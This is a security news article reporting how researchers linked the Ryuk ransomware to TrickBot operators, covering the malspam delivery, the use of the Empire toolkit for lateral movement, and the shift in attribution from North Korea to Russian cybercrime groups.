Which is the link between Ryuk ransomware and TrickBot?

Pierluigi Paganini January 14, 2019

FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.

In August 2018, security experts from Check Point uncovered a ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor. This is the first time that a security firm detected the Ryuk Ransomware.

The campaign appears as targeted and well-planned, threat actors targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.

Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files, CheckPoint confirmed that the ransom amount paid by the victims ranged between 15 BTC to 50 BTC.

At least three organizations in the United States and worldwide were severely affected, the attackers are estimated to have already netted over $640,000 to date.

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation on the malware allowed the experts from security firms FireEye and CrowdStrike to discover that threat actors behind the
Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with threat actors behind TrickBot, a malware that once infected a system creates a reverse shell back to the attackers allowing them to break into the network.

Experts at Crowdstrike believe the Ryuk ransomware is operated by a crime gang they tracked as GRIM SPIDER, in particular by its Russian based cell dubbed WIZARD SPIDER that is behind TrickBot.

“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by

“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”

FireEye is tracking the same financially-motivated activity as TEMP.MixMaster which involved attackers using the Ryuk ransomware associated with TrickBot infections. 

The circumstance suggests that TrickBot operators are adopting the crime-as-a-service model to offer access to systems they have previosly compromised.

“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations,”

TrickBot is distributed through massive spam campaigns or it can be delivered by the Emotet that is also distributed through malspam.

FireEye experts observed malspam campaign distributing Ryuk that used messages pretending to be a Deloitte payroll schedule.

“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.

“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.”

Attackers used the PowerShell post-exploitation toolkit called Empire. Empire to distribute payloads through the accessed network.

Empire allows to steal credentials on other computers in the network and then install the Ryuk Ransomware on them.

The investigations conducted by FireEye, CrowdStrike, McAfee seems to exclude that Ryuk is associated with North Korea, the experts believe threat actors behind the ransomware are from Russia.

According to McAfee, initial attribution to North Korea might be wrong because only based on the code similarities between Ryuk and Hermes. The experts pointed out that in August 2017, the Hermes ransomware was being sold online on Exploit.in by a Russian speaking actor.

Likely, the Lazarus Group bought the ransomware and used it in its operations to make hard the attribution of the operation.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)

[adrotate banner=”5″]

[adrotate banner="13"]

you might also like

leave a comment